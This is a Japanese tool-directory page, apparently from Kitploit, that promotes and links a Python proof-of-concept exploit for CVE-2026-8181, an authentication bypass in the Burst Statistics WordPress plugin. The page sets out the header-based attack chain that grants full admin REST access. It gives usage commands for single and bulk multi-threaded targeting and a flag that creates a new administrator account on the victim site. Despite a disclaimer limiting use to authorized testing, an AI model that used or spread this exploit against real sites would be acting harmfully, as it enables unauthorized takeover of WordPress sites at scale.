Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-8181 — CVE-2026-8181 PoC: Burst Statistics(3.4.0–3.4.1.1)の認証バイパス。Pythonツール — 単一・複数ターゲットのスキャン、スレッド化されたワーカー、TXTレポート。認可されたテストのみ。メンテナー: mürrez。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-8181
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト認証
GitHubmurrez/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 PoC: Burst Statistics(3.4.0–3.4.1.1)の認証バイパス。Pythonツール — 単一・複数ターゲットのスキャン、スレッド化されたワーカー、TXTレポート。認可されたテストのみ。メンテナー: mürrez。

リポジトリを見る
33ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
タイピングイントロ EN
タイピングイントロ TR
タグライン EN/TR



CVE CVSS WP Python

EN: Burst Statistics の認証バイパスに対する 許可を得たセキュリティテストのための管理された PoC と簡潔な技術メモ。

TR: Burst Statistics プラグインの認証バイパスに対する 許可を得たセキュリティテスト用の管理された PoC と簡潔な技術概要。


プロジェクト概要

英語

注: WordPress.org に表示されている 200,000 以上のアクティブインストール という数字は、このプラグインの ユーザー全体 の数を表しており、すべてのサイトが 脆弱なバージョン で動作していることを意味する わけではありません。実際の影響を評価するには、バージョンと環境(HTTP / アプリケーションパスワードの利用可否など)を確認する必要があります。

トルコ語

注: WordPress.org の 200,000 以上のアクティブインストール という数字はプラグインの 全ユーザー数 であり、サイトの すべてが脆弱なバージョン で動作していることを意味する ものではありません。実際の影響を判断するには、バージョンと環境(HTTP、アプリケーションパスワードの利用可否など)を確認する必要があります。


ビジュアル

英語

GitHub Flavored Markdown は、リポジトリ内にファイルがない場合、バイナリ GIF を埋め込むことができません。上記の Typing SVG スニペット(CDN)は動きを再現したものです。独自のスクリーンキャプチャを追加するには:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

トルコ語

GitHub Markdown は、リポジトリ内にファイルがないと GIF の埋め込みをサポートしません。上記の Typing SVG(CDN)は文字アニメーションを表示します。独自のデモを追加するには:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

攻撃チェーン (Mermaid)

英語 — ダイアグラムのラベル

root@kitploit:~
flowchart LR
  A[Client request] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Mis-handled branch| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: full admin context]

トルコ語 — 同じフロー

root@kitploit:~
flowchart LR
  A[İstek] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Yanlış dal| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: tam admin bağlamı]

ツール機能

英語

-f 使用時、-o と --output-dir は併用できません。

トルコ語

-f モードでは、-o と --output-dir は同時に使用できません。


インストール

root@kitploit:~
pip3 install requests urllib3

使用例

英語

root@kitploit:~
# Single site, report file
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k

# Single site + new admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k

# Bulk + combined file (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k

# Bulk + per-host files in folder (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

トルコ語

root@kitploit:~
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k

# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k

# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k

# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

空の Password: フィールド

英語

バイパスに成功しても、被害者ユーザーの実際のパスワードが漏洩することはありません — PoC 内の Basic パスワードは 偽物 です。--create-user で 新しい アカウントを作成した場合を除き、Password: 行は空のままです(その場合は生成されたパスワードが書き込まれます)。

トルコ語

バイパスに成功しても 既存ユーザーの実際のパスワードは漏洩しません — PoC 内の Basic パスワードは 偽物 です。--create-user で 新しい アカウントを作成しない限り Password: 行は空のままです。作成した場合は、生成されたパスワードが書き込まれます。


参照

英語

  • Burst Statistics — WordPress プラグインディレクトリ
  • 協調開示でよく引用される: Wordfence Threat Intelligence、PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

トルコ語

  • Burst Statistics — WordPress プラグインディレクトリ
  • 協調開示でよく言及される: Wordfence Threat Intelligence、PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

免責事項

英語

書面による許可を得た評価と ご自身のラボ のみで使用してください。無許可での使用は、多くの法域で違法です。著者およびこの README のメンテナーは、不正使用について 一切の責任を負いません。

トルコ語

書面による許可を得た評価と ご自身のラボ でのみ使用できます。無許可の使用は多くの国で 違法 です。著者およびこの README の編集者は、悪用について 責任を負いません。

ツールをダウンロード
項目詳細
内容Burst Statistics の 認証バイパス(CWE-287): 細工されたヘッダーにより、REST リクエストを 完全な管理者コンテキスト に昇格させることができます。
バージョン脆弱なバージョン: 3.4.0, 3.4.1, 3.4.1.1 · 推奨: 3.4.2 以降
重大度CVSS 約9.8(Critical)。該当する条件では、リモートかつ未認証で悪用可能。
このリポジトリCVE-2026-8181.py — ラボ自動化: 単一ターゲット、バルクリスト、スレッドプール、選択的 TXT 出力。
項目詳細
内容Burst Statistics の 認証バイパス(CWE-287)。特別に細工されたヘッダーにより、REST リクエストで 完全な管理者コンテキスト を取得します。
バージョン影響を受けるバージョン: 3.4.0, 3.4.1, 3.4.1.1 · 推奨: 3.4.2 以降
重大度CVSS 約9.8(Critical)。該当する条件では、リモートかつ未認証で悪用可能。
このリポジトリCVE-2026-8181.py — ラボ自動化: 単一ターゲット、リストスキャン、スレッドプール、選択的 TXT 出力。
機能説明
単一ターゲット-u ベース URL
複数ターゲット-f targets.txt(1 行に 1 URL、# はコメント)
並列処理-j N ワーカー(上限あり)
統合ファイル-o file.txt — -f 使用時、成功した exploit のみ が追記されます
ホスト別ファイル--output-dir — 成功したもののみ host.txt が生成されます(失敗はスキップ)
新しい管理者--create-user — REST 経由でランダムなユーザーを作成(パスワードはレポートに表示されます)
TLS(ラボ)-k 証明書検証を無効化(信頼できるラボのみ)
機能説明
単一ターゲット-u ルート URL
複数ターゲット-f targets.txt(1 行に 1 URL、# はコメント)
並列処理-j N ワーカー(上限あり)
単一ファイル-o dosya.txt — -f 使用時、成功した exploit のみ 追記
フォルダ出力--output-dir — 成功したものだけ host.txt を生成(失敗はスキップ)
新しい管理者--create-user — REST 経由でランダムなユーザーを作成(パスワードはレポートに表示)
TLS(ラボ)-k 証明書検証を無効化(信頼できるラボのみ)